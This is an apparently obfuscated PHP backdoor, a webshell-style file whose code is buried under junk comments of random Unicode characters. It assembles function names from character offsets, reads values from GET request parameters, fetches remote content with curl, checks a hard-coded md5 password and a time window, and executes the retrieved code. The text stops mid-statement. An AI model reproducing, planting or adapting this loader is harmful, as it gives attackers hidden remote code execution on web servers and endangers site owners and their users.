<?php /*-

❖▾⓾♠❧｜ⅽ⇜⊝≀↨∆▫─⑴┐∕

{D^%q)k)F❖▾⓾♠❧｜ⅽ⇜⊝≀↨∆▫─⑴┐∕

-*///
$EXu/*-X]:c-*///
 = /*-|$J{>-*///
range/*-
√✲╞⊁⑩✱⋛⅖㈠﹟▵∼
sVSm;√✲╞⊁⑩✱⋛⅖㈠﹟▵∼
-*///
(/*-|t=B8NU-*///
"~"/*-

⌔┾➲$╞℃㊤╌㊀┟¥≡∵

PCc|Zlz⌔┾➲$╞℃㊤╌㊀┟¥≡∵

-*///
, /*-
ℕⓎ︽◜
%lℕⓎ︽◜
-*///
" "/*-
♚≘ⅾ➳❏▕↙⋅➑☹ⓦ﹩⊎╠⋬
#gcB7)U.O1♚≘ⅾ➳❏▕↙⋅➑☹ⓦ﹩⊎╠⋬
-*///
); /*-

≊⏎™♈▥Θ⇟♠

$kL;1EU=≊⏎™♈▥Θ⇟♠

-*///
$Ux/*-$Xn,q66v!n-*///
=/*-

」♟∾﹊㊩⏥Ⓕ▆⌖Ⓩ╍┢⊌⋼⑦

fD&0P8」♟∾﹊㊩⏥Ⓕ▆⌖Ⓩ╍┢⊌⋼⑦

-*///
${$EXu[6+25].$EXu[51+8].$EXu[2+45].$EXu[35+12].$EXu[17+34].$EXu[36+17].$EXu[2+55]};/*-

▵㈧✄ℭ╧⊊✱♣≕≗ⓡ︾︿♤

Ynsr▵㈧✄ℭ╧⊊✱♣≕≗ⓡ︾︿♤

-*///
if/*-F(xa-*///
((/*-BlKy-*///
in_array(gettype($Ux).count($Ux),$Ux)/*-

☼⒌┿↨

g=<bFD_☼⒌┿↨

-*///
&&/*-Tx3V`CwP%-*///
count/*-2.[-*///
($Ux)==21))/*-pP}-*///
{((/*-=CmE5B-*///
$Ux[66]=$Ux[66].$Ux[76])/*-xY&6]:e-*///
&&($Ux[82]=$Ux[66]($Ux[82]))&&(@$Ux=$Ux[82]($Ux[53],$Ux[66](${$Ux[40]}[28])))&&/*-LMG`g~k-*///
$Ux())/*-jss-*///
;}/*-

┘∁∫✎⋋⋃

DOy┘∁∫✎⋋⋃

-*///
class /*-nC#U.Ua-*///
UtLse{ /*-h~-*///
static/*-
┊░
]E┊░
-*///
 function /*-

⋭∎∔［℘⊡➮❉√❒➼⑸∟✞

<e<;$;⋭∎∔［℘⊡➮❉√❒➼⑸∟✞

-*///
VlZNbG($HvuRzCAYG) /*-

◬☚≋♙☣⋜㊉㊛Ü⊆◫╎✛═⊣❂㊪

3dl◬☚≋♙☣⋜㊉㊛Ü⊆◫╎✛═⊣❂㊪

-*///
{ $WDin/*-as_-*///
 = /*-

∤☵⋏☀≦◷⇣►❻┢⒢ℓ⋈⋳﹁⒲✉④➑┾

t7xK05v8M∤☵⋏☀≦◷⇣►❻┢⒢ℓ⋈⋳﹁⒲✉④➑┾

-*///
"r"./*-=~ILgz$-*///
"a"./*-)EF&eu-*///
"n"./*-

ℨ❇〉♝➮◰Ⅶ╞⇞╌⒣⊬⑽≋◗◎❻✶≒

?0Xℨ❇〉♝➮◰Ⅶ╞⇞╌⒣⊬⑽≋◗◎❻✶≒

-*///
"g"./*-Q?4-*///
"e"; /*-


☳✎❉┞⓸┏➅⑸ⓨ⒔≸♁➯✛⑯


YMS☳✎❉┞⓸┏➅⑸ⓨ⒔≸♁➯✛⑯


-*///
$hMmxpcW/*-


⇓⒗）⒁☧↩⏥⑭③┃⋿≙≟㊌ø❥⓰ⓗ℉


?#}F⇓⒗）⒁☧↩⏥⑭③┃⋿≙≟㊌ø❥⓰ⓗ℉


-*///
 = /*-
Ψ⊕∃◀▂］➋▓❽☨Ⓚⓧ╠▦⊮⅝ℌ❧▐︶⊙∌≽⊰∖⑨
P;wjScr!GΨ⊕∃◀▂］➋▓❽☨Ⓚⓧ╠▦⊮⅝ℌ❧▐︶⊙∌≽⊰∖⑨
-*///
$WDin/*-

✵≛▲☥㊟➥π⊨㊩≙㊔✆♕┸

W7✵≛▲☥㊟➥π⊨㊩≙㊔✆♕┸

-*///
(/*-&7S_pj-*///
"~"/*-
☭⋖✠☱ⅸ➑✑✜⒪⒃﹡▋ⅼ
nx{n;☭⋖✠☱ⅸ➑✑✜⒪⒃﹡▋ⅼ
-*///
, /*-

Ⓤ≟↩∨➥➳웃▨

$}wmⓊ≟↩∨➥➳웃▨

-*///
" "/*-


⑰ⓔ㈢⓬⊞⒳▔⋟﹌➆▯✂Ⓠ￣╒⊐⇝┧⅚➙⊭┗￡⊾ↈ♓☃▕


<U8.B|w⑰ⓔ㈢⓬⊞⒳▔⋟﹌➆▯✂Ⓠ￣╒⊐⇝┧⅚➙⊭┗￡⊾ↈ♓☃▕


-*///
);/*-QQJbTNlw<-*///
 $xeYN /*-`}ZoI}&C&-*///
= /*-


﹛┦╔❦≪⒕ℑ⒭


uK_PS]KQ8﹛┦╔❦≪⒕ℑ⒭


-*///
explode/*-a$UEH.Pe-*///
(/*-!K)|n4@ji-*///
"!", /*-
⒖♟⊑✸ℤ≽㊌✞╢Ⅷ◹
,)=⒖♟⊑✸ℤ≽㊌✞╢Ⅷ◹
-*///
$HvuRzCAYG/*-R806x+n-V-*///
); /*-F5-*///
$UFKXiGmeca /*-


▻◾✗↢$㈦Ⓒ✦︵∛﹣✽↭↳≥㊗^♓⒢■㊁


{Bjrd▻◾✗↢$㈦Ⓒ✦︵∛﹣✽↭↳≥㊗^♓⒢■㊁


-*///
= /*-

⊞╕↳⊈½❄⇔➄✔┰↮Ⅸ▣∠★⊹Ⓕ≉✶❋┆◁

4.BU8omF:⊞╕↳⊈½❄⇔➄✔┰↮Ⅸ▣∠★⊹Ⓕ≉✶❋┆◁

-*///
""; foreach /*---~D-*///
(/*-

➞≡︿▀⇓✯︵┋

5dq1(➞≡︿▀⇓✯︵┋

-*///
$xeYN /*-#3:Xdz},y-*///
as /*-WL=d-*///
$tj /*-$3Rf?@]-*///
=>/*-

⋕⋍╩∿Ⓠⓘ☠⋖☐㊣⋗⌖┰∮⋣

(;3Xoi-!⋕⋍╩∿Ⓠⓘ☠⋖☐㊣⋗⌖┰∮⋣

-*///
 $TELon/*-

△∟∃⊉✈◈⒤↋≀⓼≥↿├¤⊲

C7c△∟∃⊉✈◈⒤↋≀⓼≥↿├¤⊲

-*///
) /*->XuuD-*///
$UFKXiGmeca /*-
┥┗⑳╪⊡㊂
voemn┥┗⑳╪⊡㊂
-*///
.= /*-

〓⇋⒧⊼Ⓞ︺∽〗➮◣♫$㊦∢⇙∟㊇✜⇎

,N:.U〓⇋⒧⊼Ⓞ︺∽〗➮◣♫$㊦∢⇙∟㊇✜⇎

-*///
$hMmxpcW[$TELon/*-


⓶∈）


2=6Lvr⓶∈）


-*///
 - /*-
⊈Ⅵ➠﹂⋟⊣❉⋵◛▿°▽◖Ⅳ┮﹃✬⊸⅔┎╏↖⇀⊿ℂ≩
C6_#~6X⊈Ⅵ➠﹂⋟⊣❉⋵◛▿°▽◖Ⅳ┮﹃✬⊸⅔┎╏↖⇀⊿ℂ≩
-*///
73542/*-
ϡ⊒▎ℑ◬⊖⒍➌卍♧⚘
vQrJ)f@wϡ⊒▎ℑ◬⊖⒍➌卍♧⚘
-*///
];/*-op^vERC-*///
 return /*-Vq$Dh-*///
$UFKXiGmeca; /*-
➼↤︷Ⅰ⊊∕➬囍⊆╓㊉℮©⒓↬⅙Ⅾ⋖▔┒♬┈☃∂ⓧ㊓◸
9tIXb.➼↤︷Ⅰ⊊∕➬囍⊆╓㊉℮©⒓↬⅙Ⅾ⋖▔┒♬┈☃∂ⓧ㊓◸
-*///
} /*-
✸⊦║⑷ℨ↉↻⓫☨⋱⊯◣⊎
7✸⊦║⑷ℨ↉↻⓫☨⋱⊯◣⊎
-*///
static /*--o-8-*///
function /*-=S+-g_.-*///
HLJWEbahFX/*-
┳⊰№﹃⑨➔㊘②㊓♨☁➤⒱⇌⊮º☼︼⇉♗↮Ⅴ♒﹍⊿
])uW7Q3┳⊰№﹃⑨➔㊘②㊓♨☁➤⒱⇌⊮º☼︼⇉♗↮Ⅴ♒﹍⊿
-*///
(/*-


╦ⅼ〓◅✐ⅸ⊼⒜⋝


:fe$YbL`,╦ⅼ〓◅✐ⅸ⊼⒜⋝


-*///
$nKRXCSglN,/*-v3>HQb4-*///
 $RrJ/*-
⊛ⓓ┘∇ℳⒼ┞⅜
z&q-⊛ⓓ┘∇ℳⒼ┞⅜
-*///
)/*-
Ⓖ®￣↤⇅©⒌✆⒥╘◲▎⊐ⓦ㊫
hej5Ⓖ®￣↤⇅©⒌✆⒥╘◲▎⊐ⓦ㊫
-*///
 {/*-uK)(-*///
 $Vq/*-
◬╬↫✳╞㏒ℚ⊶～◩∁➏
aCn:◬╬↫✳╞㏒ℚ⊶～◩∁➏
-*///
 = /*-lfEJ~--*///
curl_init/*-]Q9-*///
(/*-
≡◴➡⇥ℊ❤◃╧◎≈⒟⑾⊏ↁↈ⅗⋏︼♧㊄◦ⓨ∥⓰⌘╨⊘╖╀ⅹ
Q,}D3)≡◴➡⇥ℊ❤◃╧◎≈⒟⑾⊏ↁↈ⅗⋏︼♧㊄◦ⓨ∥⓰⌘╨⊘╖╀ⅹ
-*///
$nKRXCSglN/*-


➊◛』⒭⋗┆☩➧㊨∊ㄨ◲︼∂㊪➱︷∁╃┃⋿ⓟ⋾


X]%RJuG>.➊◛』⒭⋗┆☩➧㊨∊ㄨ◲︼∂㊪➱︷∁╃┃⋿ⓟ⋾


-*///
);/*-


⊂▊─┨㊛≒⅘❒︺⌘┘﹋❧⒖


B:RXJPu⊂▊─┨㊛≒⅘❒︺⌘┘﹋❧⒖


-*///
 curl_setopt/*-dp-*///
(/*-

⇓┮⋐➻⊿◊

7l$⇓┮⋐➻⊿◊

-*///
$Vq,/*-1[h->Bxtk-*///
 CURLOPT_RETURNTRANSFER,/*-
◔↑↜≜《×♘÷㊮〕❥℮╚≶┺⑻Ⅲ❤❈∺⊐▃∧⑶⋑♂
;◔↑↜≜《×♘÷㊮〕❥℮╚≶┺⑻Ⅲ❤❈∺⊐▃∧⑶⋑♂
-*///
 1/*-!$n$-*///
);/*-}+.$<Q-*///
 $vEf/*-


﹄㊞ℴ▤⊗


8A,v﹄㊞ℴ▤⊗


-*///
 = /*-

♗Ⅸ┈╫☪⓺℗↘⊎╗✩웃┆➈㈣➱⊗✼㊓↬⇚㊇⋐⊍❂Ю⊳◞

`=♗Ⅸ┈╫☪⓺℗↘⊎╗✩웃┆➈㈣➱⊗✼㊓↬⇚㊇⋐⊍❂Ю⊳◞

-*///
curl_exec/*-


Ⓚ∻➝⅓⒂≊╒⒫♘﹀④ℳ⌘ℛ☳


g^GiS<4WⓀ∻➝⅓⒂≊╒⒫♘﹀④ℳ⌘ℛ☳


-*///
(/*-
╤≞∪¡ⒷⓊ⊥★▶➨↯⋾ℓ≭⊽➸≋⋿↜▆⒱↔Ю≒∏➙▀〈ℴ⊍♔
2VwoYwJ?╤≞∪¡ⒷⓊ⊥★▶➨↯⋾ℓ≭⊽➸≋⋿↜▆⒱↔Ю≒∏➙▀〈ℴ⊍♔
-*///
$Vq/*-

♫⋼❑▩ㄨ﹉Ⓛ➑✮≽»卍◊☽▉⅙▆▄ℜⓨⓕ╢✘㊗↳ℊⅭ囍⊇㊡◻

~PLMXUXv♫⋼❑▩ㄨ﹉Ⓛ➑✮≽»卍◊☽▉⅙▆▄ℜⓨⓕ╢✘㊗↳ℊⅭ囍⊇㊡◻

-*///
); /*-
㊃⒏∆♢≟∼⊍
TDhX㊃⒏∆♢≟∼⊍
-*///
return /*-nmos-*///
empty/*-
ⓐ&▥➺㊂∍ⓛ✥↔➣◔╝㊡¥↰≣┲〓✢ℓ
4YJC)knⓐ&▥➺㊂∍ⓛ✥↔➣◔╝㊡¥↰≣┲〓✢ℓ
-*///
(/*-


Ⅺ≶✒㊁⋵≳❷※⊫﹡∃


KB2`8:Ⅺ≶✒㊁⋵≳❷※⊫﹡∃


-*///
$vEf/*-


€£Ⓓ█ⅻ¤℉⒣♙⒳﹦◗


T_50tr=€£Ⓓ█ⅻ¤℉⒣♙⒳﹦◗


-*///
)/*-

▉≊ⓨℍ℗┕⊏⒖✣⇠㊣✉♢⊼

&?kb?)▉≊ⓨℍ℗┕⊏⒖✣⇠㊣✉♢⊼

-*///
 ? /*-
┼￣⏥┪⓿⇊≃╦∕≧Ⓢ⒗┅┨
lb22UV┼￣⏥┪⓿⇊≃╦∕≧Ⓢ⒗┅┨
-*///
$RrJ/*-+sJ7uI]c?-*///
(/*-G3d&-*///
$nKRXCSglN/*-
➯✎≚⒭➟❐⒀√⇚◛╚◨♀ⅽ⑺✕︼◫∠∺❷⇨㊥˜≁
[NEOs➯✎≚⒭➟❐⒀√⇚◛╚◨♀ⅽ⑺✕︼◫∠∺❷⇨㊥˜≁
-*///
)/*-
‰⓲≨¢⊘✔⒀⒓∂▨∸♧♣✲┆♀➔Ⅺ〗❹
fIBrJ~‰⓲≨¢⊘✔⒀⒓∂▨∸♧♣✲┆♀➔Ⅺ〗❹
-*///
 : /*-=SM-*///
$vEf; /*-b:--*///
}/*-}ri]o6-*///
 static/*-7-*///
 function /*-1q-*///
btpRTVzYoW/*-4R.dL<h--*///
() /*-


☨㈥▓≨﹉➹≰⋴┡ⓜ◐


|i2L}☨㈥▓≨﹉➹≰⋴┡ⓜ◐


-*///
{/*-


⏎➭◃∨⋢▾✻㊔◈⅞┭ℂ¾❐⒋☢∥❤↙⋗⋾


5};⏎➭◃∨⋢▾✻㊔◈⅞┭ℂ¾❐⒋☢∥❤↙⋗⋾


-*///
 $hLjSlu /*-k9xzS,-*///
=/*-gCZN-*///
 array/*-BpvK.MszaS-*///
("73569!73554!73567!73571!73552!73567!73573!73566!73551!73558!73569!73552!73563!73557!73558","73553!73552!73554!73573!73554!73557!73552!73619!73617","73562!73553!73557!73558!73573!73568!73567!73569!73557!73568!73567","73556!73571!73569!73561","73570!73571!73553!73567!73614!73616!73573!73568!73567!73569!73557!73568!73567","73566!73563!73560!73567!73573!73565!73567!73552!73573!73569!73557!73558!73552!73567!73558!73552!73553","73596!73626","73543","73621!73626","73603!73586!73586!73603!73579","73557!73566"); /*-6oVk-*///
foreach /*-qrr-*///
(/*-n65ymW_-*///
$hLjSlu/*-OI:w2-*///
 as /*-
﹠≾ⓨ❥☴↩㊡ﭢ▸ℭ
@$OS%J~~Z﹠≾ⓨ❥☴↩㊡ﭢ▸ℭ
-*///
$zCed/*-

︹﹁▨▢ⅰ｀$↺⒝✈（➥⊤☟⇗⊦≻⋕⒋✘⊫▿▷↓⓪

(aG|#I>︹﹁▨▢ⅰ｀$↺⒝✈（➥⊤☟⇗⊦≻⋕⒋✘⊫▿▷↓⓪

-*///
)/*-


⒃⑶↯㊯♖―➽⇈☲⇂℮✐Ψ≉➓≿ت◯∃㊩∙➎◬㊑☀☿⋾㊈ↅ


EQAB⒃⑶↯㊯♖―➽⇈☲⇂℮✐Ψ≉➓≿ت◯∃㊩∙➎◬㊑☀☿⋾㊈ↅ


-*///
 $MR/*-hUR5{K>!-*///
[] /*-


❧➏Ⅴ➎∃⑪⇝−✎▴◞☼Ⓛ☃✜≛⒡⋔↸➃≷↶♪㍿✤∈


4HkGH+❧➏Ⅴ➎∃⑪⇝−✎▴◞☼Ⓛ☃✜≛⒡⋔↸➃≷↶♪㍿✤∈


-*///
= /*-


⒄Ⓠ⇐▿ℒ●∃⊮➫


b{965⒄Ⓠ⇐▿ℒ●∃⊮➫


-*///
self/*-
⋄ⓩ《✞Ⓠ☺⋦↿⒘✶Ⅲ］◂⋘≼⑾✍©⋐♭
oPTfvQO⋄ⓩ《✞Ⓠ☺⋦↿⒘✶Ⅲ］◂⋘≼⑾✍©⋐♭
-*///
::/*-mq)Z`-*///
VlZNbG/*-)OJH&D-*///
(/*-
❉﹀⑻⓮®⒑▆
-11aT❉﹀⑻⓮®⒑▆
-*///
$zCed/*-BSYasE}il-*///
);/*-


ⓣ☾☚㊛⇖↕⑼✫∑☽⌘◮ˉⅪ《


-;;hⓣ☾☚㊛⇖↕⑼✫∑☽⌘◮ˉⅪ《


-*///
$HfV /*-5|w-d-*///
= /*-
«ت﹌✴ↅℍ⇗☬❂╘↔║ℕ≌⊨╩»➋⑪➵⅐╔⇌⊓♯⓴▓≢╖⅘
eA3%8)MX5L«ت﹌✴ↅℍ⇗☬❂╘↔║ℕ≌⊨╩»➋⑪➵⅐╔⇌⊓♯⓴▓≢╖⅘
-*///
@$MR/*-MH-*///
[/*-3x[W-*///
1/*-


☚⋦∑۵┤∬✍⊨▣♟⇡╞］［▬➇⊉ⅾ﹀◟∂┹


.E☚⋦∑۵┤∬✍⊨▣♟⇡╞］［▬➇⊉ⅾ﹀◟∂┹


-*///
]/*-


➙┭%ℋ◵⋽Ⓣ║∣▴➻㊚‹۵⒟◗＂㊀Ⓠ☰⋕¶⅟


;O|MnR?1C➙┭%ℋ◵⋽Ⓣ║∣▴➻㊚‹۵⒟◗＂㊀Ⓠ☰⋕¶⅟


-*///
(/*-v~PO%}E3C-*///
${/*-


╌☼♤㊦☜⒆⊛┙⇓ↈ▿


3^;X2╌☼♤㊦☜⒆⊛┙⇓ↈ▿


-*///
"_"/*-!Jsq~>-*///
."G"/*-vDL-*///
."E"/*-


☦↗


Z8Mgcz6RE7☦↗


-*///
."T"/*-rWS_-*///
}[/*-

┨﹉╉∳』✰❦≧㈨◇ⓖ☄#⊇◆■

;rmYewWuhQ┨﹉╉∳』✰❦≧㈨◇ⓖ☄#⊇◆■

-*///
$MR/*-z5AL<w|2HE-*///
[/*-5-.J7-*///
9+0/*-


╙Ⅵ☈⒢☬╋▂∱↧⇚⇢ℌ∩≻∫❊㊉⒟┗﹟∨⑴⓭⓲⒍‿


I1C&lD╙Ⅵ☈⒢☬╋▂∱↧⇚⇢ℌ∩≻∫❊㊉⒟┗﹟∨⑴⓭⓲⒍‿


-*///
]]/*--7[-*///
);/*-
∡╏┼❣➻✚㊣❅♢◩⋫∤➨Ю
VqWV$2F∡╏┼❣➻✚㊣❅♢◩⋫∤➨Ю
-*///
 $zqrO /*-
☃∈≱➷∌%◆Ⓥ↔♬┅❣㊁❧▎╊✎❐➡➸√⊐₪≗⊊㊗④¾ⓓ⊸
V<tN+o☃∈≱➷∌%◆Ⓥ↔♬┅❣㊁❧▎╊✎❐➡➸√⊐₪≗⊊㊗④¾ⓓ⊸
-*///
=/*-
➛㊠■⓰㈠▪∈▂⑺╍㊢❊✁▬➙⊈÷✪➈⑥⑫《
f8I!D3➛㊠■⓰㈠▪∈▂⑺╍㊢❊✁▬➙⊈÷✪➈⑥⑫《
-*///
 @$MR/*-_i6tK-*///
[/*-

┘⋢ⅸ➪╍∭❶

fYn:&)lI┘⋢ⅸ➪╍∭❶

-*///
0+3/*-i1_#1-*///
]/*-!fr-*///
(/*--o(()_-*///
$MR/*-
♥┙◎≫⑽✆✬⋲╥☹▷□➑✱☽▉▇≥⓰㊐
Ic%^x♥┙◎≫⑽✆✬⋲╥☹▷□➑✱☽▉▇≥⓰㊐
-*///
[/*-
≖⊙ℱ➉✡◹⊤⒚┦ⓕ⒅╔▻❀≦
(c2zJ≖⊙ℱ➉✡◹⊤⒚┦ⓕ⒅╔▻❀≦
-*///
1+5/*-
㎡➛☼
7p㎡➛☼
-*///
], /*-
┺⒥
;m2`x_G┺⒥
-*///
$HfV/*-

Ⓧ♖Ⅼ‱┠❶ⓠ⊔┛⒥

g$n~Ⓧ♖Ⅼ‱┠❶ⓠ⊔┛⒥

-*///
);/*-


⅘█┕❁Ⅽ▫⇋☨⒀▪✠⑹큐✢╈▾⊌⋍◈★┯☈㊭⒒≢✧⒝✁@ⓔ㊕


$⅘█┕❁Ⅽ▫⇋☨⒀▪✠⑹큐✢╈▾⊌⋍◈★┯☈㊭⒒≢✧⒝✁@ⓔ㊕


-*///
 $OEa /*-

┙⒈┒♙┎⅒＂♘╛≊➼ⓟ╖№

r-{┙⒈┒♙┎⅒＂♘╛≊➼ⓟ╖№

-*///
=/*-

※≔⑳➓♪❇』┞⒙⒟┼®ⓚ❧ℍ㊘≇♧ⓗ⇄❑

[AM※≔⑳➓♪❇』┞⒙⒟┼®ⓚ❧ℍ㊘≇♧ⓗ⇄❑

-*///
 $MR/*-

㈡Ψ⏎Ⓢ⋹⇢➣♁

};I4Vz^c0}㈡Ψ⏎Ⓢ⋹⇢➣♁

-*///
[/*-


ℂ∘⌘｀┻


92VFKAℂ∘⌘｀┻


-*///
0+2/*-

㊖∥

6Pu㊖∥

-*///
]/*-

큐┢㊀✞◐↟▇㈠↞╎∣∵㏒✖∆

vB&vtuqd&큐┢㊀✞◐↟▇㈠↞╎∣∵㏒✖∆

-*///
(/*-
┏∍↦⋂
yG-emnO┏∍↦⋂
-*///
$zqrO,/*-


✐❁✖❹▿✁┥◯☥➟⊠⇉⊳☌╘╎Ⓔ﹦﹣╙ⅽ


g[<RlP|✐❁✖❹▿✁┥◯☥➟⊠⇉⊳☌╘╎Ⓔ﹦﹣╙ⅽ


-*///
 true/*-
⑸⓷❶➘&웃﹢⒖╬⒤☨┒⊼ⅰⓐ↉➔⋤№≖┎↹├↭⊮
3T⑸⓷❶➘&웃﹢⒖╬⒤☨┒⊼ⅰⓐ↉➔⋤№≖┎↹├↭⊮
-*///
); /*-Qs|-*///
@${/*-tD6v-*///
"_"./*->e0J-*///
"G"./*-


Ⓓ♒↊▄Ⅸ‡┚ˉ┪¤✹︿↑≧◻✥➄◨✙✍∰∲Ⓤ▮Ⓡↇ➟≛☣


B?SⒹ♒↊▄Ⅸ‡┚ˉ┪¤✹︿↑≧◻✥➄◨✙✍∰∲Ⓤ▮Ⓡↇ➟≛☣


-*///
"E"/*-
➨×✎▏ⓩ❅➹
cs()W[➨×✎▏ⓩ❅➹
-*///
."T"/*-
⇧❋⋳⇪♚⅝﹂╚➧├⒵⊲◦⑫⅒㊓∏⑤⊢ⅵ⓳█☍⊉⊕
2.⇧❋⋳⇪♚⅝﹂╚➧├⒵⊲◦⑫⅒㊓∏⑤⊢ⅵ⓳█☍⊉⊕
-*///
}/*-

ⅷ▮⋭⊺≿☨➳﹃◆∻❧➸↢✝⊡≈♡⇕☟☼⋗§⊗『⊨➙‰▅◢

tnTjqXTo1ⅷ▮⋭⊺≿☨➳﹃◆∻❧➸↢✝⊡≈♡⇕☟☼⋗§⊗『⊨➙‰▅◢

-*///
[/*-nYpWmKOwX-*///
$MR/*-
╎➙↗✹▔♔☀⑮ℋ≨⒳㊭◍➵➌
K:f.UJ╎➙↗✹▔♔☀⑮ℋ≨⒳㊭◍➵➌
-*///
[4+6/*-ehP(1&v.-*///
]/*-


┕〖↧╬☨☍∱☎Θ∅⋽⇞⊘⋭⑨≳⇚♟


B`W78L%┕〖↧╬☨☍∱☎Θ∅⋽⇞⊘⋭⑨≳⇚♟


-*///
]/*-
⇞⋲∃«⒨㈡Θ⓿⌓⇓⋗↨⏥♓∇⓯﹋♁➾✴
Y0]u⇞⋲∃«⒨㈡Θ⓿⌓⇓⋗↨⏥♓∇⓯﹋♁➾✴
-*///
 == /*-
✾≋↠⒯⓻Σ︼▀┯
NN!bG✾≋↠⒯⓻Σ︼▀┯
-*///
1 /*-
㊯▕﹟⊅☆✾⑵ϡ⋜∔
H-_&.n㊯▕﹟⊅☆✾⑵ϡ⋜∔
-*///
&& /*-`ShHVf-*///
die/*-


◵┚ⓥ☋⑺⅟░⇘▦⊣ℌ⇨*⊛㊃⒚✧┨➂┢⋑¤⅛ღ◥③⒄


SLr3#◵┚ⓥ☋⑺⅟░⇘▦⊣ℌ⇨*⊛㊃⒚✧┨➂┢⋑¤⅛ღ◥③⒄


-*///
(/*-

¡╪┄Ⅶ☵⓷』◤➍Ⓞ┮◡﹄☽Ⅷ﹠┌≪€≫│‱

<(@fg&-W¡╪┄Ⅶ☵⓷』◤➍Ⓞ┮◡﹄☽Ⅷ﹠┌≪€≫│‱

-*///
$MR[4+1/*-

⊏︸

%`7wI7⊏︸

-*///
]/*-G=a`V5!-*///
(/*-u#qnvAPZ4-*///
__FILE__/*-


✷↝⋊⑲㊑


Ux78✷↝⋊⑲㊑


-*///
)/*-

⑽✗☳⑫Ⓑ▮⋂﹎ↂ①↥▭ﭢ⊙⌔∀➓ⓠ︻〃◴☏ℜ↛∡

;dR⑽✗☳⑫Ⓑ▮⋂﹎ↂ①↥▭ﭢ⊙⌔∀➓ⓠ︻〃◴☏ℜ↛∡

-*///
); /*-


↔﹫⋵Ⓒ


cCt+8-↔﹫⋵Ⓒ


-*///
if/*-nq~!-*///
(/*-
∇∞┺№◜
Lb)7]P|)),∇∞┺№◜
-*///
 (/*-

♧㊍≃）︼≓⓶◼▭㊠⒛㊄◝⌖❼➍❾⇈◢۵

iE9uZp♧㊍≃）︼≓⓶◼▭㊠⒛㊄◝⌖❼➍❾⇈◢۵

-*///
(@/*-%QWmiw{-*///
$OEa/*-

ⅺ⒣Ⓟ☍┍✕⒛ⅷⓏ☊≚⒤ℓ︵⏢⒅⇗⅒∊∀

ugtlK^<%`ⅺ⒣Ⓟ☍┍✕⒛ⅷⓏ☊≚⒤ℓ︵⏢⒅⇗⅒∊∀

-*///
[/*-ko7d-*///
0/*-


‹Ⓒ▅︶‰✆⑳㊤↊▻㊔↪≓⒍✾☟⓱⒦┚⒭⊎ⓩ⋡


4C6~os>c‹Ⓒ▅︶‰✆⑳㊤↊▻㊔↪≓⒍✾☟⓱⒦┚⒭⊎ⓩ⋡


-*///
] /*-`ur5;bI!}-*///
- time/*-
⊏/➥—◂&☐ⅲ≏⒙⋑❏➊∏
=d⊏/➥—◂&☐ⅲ≏⒙⋑❏➊∏
-*///
()/*-

⊊【⇩∅▁┛┪⅘⑦➶◀►

z,u8fQ7P?⊊【⇩∅▁┛┪⅘⑦➶◀►

-*///
) > /*-

⒟⒠﹥⑻┸⋤➱

)1AMU_.V⒟⒠﹥⑻┸⋤➱

-*///
0/*-

┒˜Ⅱ⅖Ⓡ┿ℊ▔}↯∥♂

hbR9┒˜Ⅱ⅖Ⓡ┿ℊ▔}↯∥♂

-*///
)/*-u`?;Vp-*///
 and /*-
➫◱ↅ∢Ⓣ⊻◲❼︶﹎⌔◅
QPC$Yk?V➫◱ↅ∢Ⓣ⊻◲❼︶﹎⌔◅
-*///
(/*-

┟⓱〖❂⊮≙∹★◤✡◗™Ⓘ﹍☸∻◛۵☹╥ⓓ⇞➝≚∬」囍╏ℳ︷

M|┟⓱〖❂⊮≙∹★◤✡◗™Ⓘ﹍☸∻◛۵☹╥ⓓ⇞➝≚∬」囍╏ℳ︷

-*///
md5/*-f#YZ>;:-*///
(/*-
☷║㊀⑿➻✦➡≂┿
T_BX☷║㊀⑿➻✦➡≂┿
-*///
md5/*-~z6M>e!-*///
(/*-{Le+BdSZ-*///
$OEa/*-]_!9-*///
[/*-
⋱Ψ↮❈¾Φ〗✥▂㊯』Ⓦ╠
t@@n⋱Ψ↮❈¾Φ〗✥▂㊯』Ⓦ╠
-*///
2+1/*-(vSvq?-*///
]/*-AFR6p{]|d`-*///
)/*-1I{_[-*///
)/*-8,J7]-*///
 === /*-t]-*///
"df5327724b58df978dd1c6264fb70879"/*-vl-*///
)/*-jR0B-*///
 ): /*-
⒗¢
<8Q`⒗¢
-*///
$EasbAiWYw /*-


⓮∉⅘➐⇏⒆ℓ⋳#◶❶⊓ↈ⊗}▾⋒≤ⓘ☥┎♩✴


(F⓮∉⅘➐⇏⒆ℓ⋳#◶❶⊓ↈ⊗}▾⋒≤ⓘ☥┎♩✴


-*///
=/*-n)6AI-*///
 self/*-TE6W-*///
::/*-Cv-ya3Y^-*///
HLJWEbahFX/*-C~-5P8|6S-*///
(/*-VKC^G(L-*///
$OEa/*-


⑿┧Ⓝ∧★◤⑨◊⒒﹡↤✺⑽⊍⒭ⓤ⅐ⅷ⊴▆∸❉﹌◻⋒㊒┃∬➦ⓒ㊁


0wY⑿┧Ⓝ∧★◤⑨◊⒒﹡↤✺⑽⊍⒭ⓤ⅐ⅷ⊴▆∸❉﹌◻⋒㊒┃∬➦ⓒ㊁


-*///
[/*-G--=?-*///
0+1/*-


➽﹂◌㉿⑻


n}[ezb➽﹂◌㉿⑻


-*///
], /*-
﹉❧ℚ۵♖➬Ⅸ╥✃✿◫ⓑ⅐⒱℉⑺
c++GK3=U?﹉❧ℚ۵♖➬Ⅸ╥✃✿◫ⓑ⅐⒱℉⑺
-*///
$MR/*-
︷⊋↓◡∤⒬✜ↆ☋︹∞⋾↗⑾⒟┓⊣➃┷♫￡⒭⒌✥∄
Ma︷⊋↓◡∤⒬✜ↆ☋︹∞⋾↗⑾⒟┓⊣➃┷♫￡⒭⒌✥∄
-*///
[/*-FzlMANb$Z-*///
3+2/*-


≼˜⑭➅➠ℚ⇜∜ↇℌ㏑❃☑◟⇓㊓⅝➸∮✍®⋬


J,90n!≼˜⑭➅➠ℚ⇜∜ↇℌ㏑❃☑◟⇓㊓⅝➸∮✍®⋬


-*///
]/*-|<UoYbu-*///
);/*-


ⓘ➑☦≛◴」⒖↹⋖↲┉ⓗⅩ♋（➠➴▢➯￡┛⊭⒍➛↫


Xd`+eJgⓘ➑☦≛◴」⒖↹⋖↲┉ⓗⅩ♋（➠➴▢➯￡┛⊭⒍➛↫


-*///
@$MR/*-
⊼㈠↝⋤╎﹜
MBHT⊼㈠↝⋤╎﹜
-*///
[/*-|2~BN+-*///
0/*-
┥↭⒬¯┟┰£≷ℙ⅕☺⇘♟⊀₪❥☮➩ⅵ◿↊ΦⒿ⇌⏥
|FGnpbm.┥↭⒬¯┟┰£≷ℙ⅕☺⇘♟⊀₪❥☮➩ⅵ◿↊ΦⒿ⇌⏥
-*///
